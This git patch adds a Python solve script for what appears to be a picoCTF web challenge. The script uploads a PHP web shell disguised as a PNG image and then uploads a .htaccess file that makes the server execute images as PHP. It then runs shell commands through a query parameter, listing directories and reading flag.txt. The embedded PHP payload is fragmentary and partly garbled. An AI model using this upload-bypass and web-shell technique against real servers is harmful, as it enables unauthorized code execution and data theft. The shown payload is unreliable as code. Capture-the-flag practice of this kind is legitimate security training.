From fd6ac3400f55187d410adfc32c35a69126d91fcf Mon Sep 17 00:00:00 2001 From: h7x4 Date: Sun, 5 Jul 2026 08:04:10 +0900 Subject: [PATCH] web/byp4ss3d --- web/byp4ss3d/solve.py | 57 +++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 57 insertions(+) create mode 100755 web/byp4ss3d/solve.py diff --git a/web/byp4ss3d/solve.py b/web/byp4ss3d/solve.py new file mode 100755 index 0000000..2a2fbd0 --- /dev/null +++ b/web/byp4ss3d/solve.py @@ -0,0 +1,57 @@ +#!/usr/bin/env nix-shell +#!nix-shell -i python3 -p "python3.withPackages (ppkgs: with ppkgs; [ requests ])" + +import requests + +BASE_URL = "http://amiable-citadel.picoctf.net:53954" + +def main(): + payload = b''' + &1'); + ?> + ''' + + res = requests.post( + BASE_URL + "/upload.php", + files = { + 'image': ('exploit.png', payload, 'image/png'), + 'submit': 'Upload ID', + } + ) + + print(res) + print(res.text) + + print('-------------------------------') + + htaccess = b'SetHandler php-script' + + res = requests.post( + BASE_URL + "/upload.php", + files = { + 'image': ('.htaccess', htaccess, 'text/plain'), + 'submit': 'Upload ID', + } + ) + + print(res) + print(res.text) + + print('-------------------------------') + + cmd = "ls -lah ../.." + res = requests.get(BASE_URL + f"/images/exploit.png?cmd={cmd}") + print(res) + print(res.text) + + print('-------------------------------') + + cmd = "cat ../../flag.txt" + res = requests.get(BASE_URL + f"/images/exploit.png?cmd={cmd}") + print(res) + print(res.text) + + +if __name__ == '__main__': + main()